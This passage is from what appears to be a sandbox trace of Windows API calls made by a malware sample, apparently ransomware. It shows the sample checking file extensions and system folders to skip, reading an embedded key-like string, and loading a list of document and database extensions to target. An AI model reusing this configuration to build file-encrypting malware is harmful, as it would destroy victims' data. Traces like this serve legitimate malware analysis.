lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0096.942] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0096.942] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0096.942] LockResource (hResData=0x516f58) returned 0x516f58 [0096.942] FreeResource (hResData=0x516f58) returned 0 [0096.942] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.942] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.942] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.942] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.942] FreeResource (hResData=0x50d64c) returned 0 [0096.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.943] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0096.943] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0096.943] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0096.943] CharLowerBuffW (in: 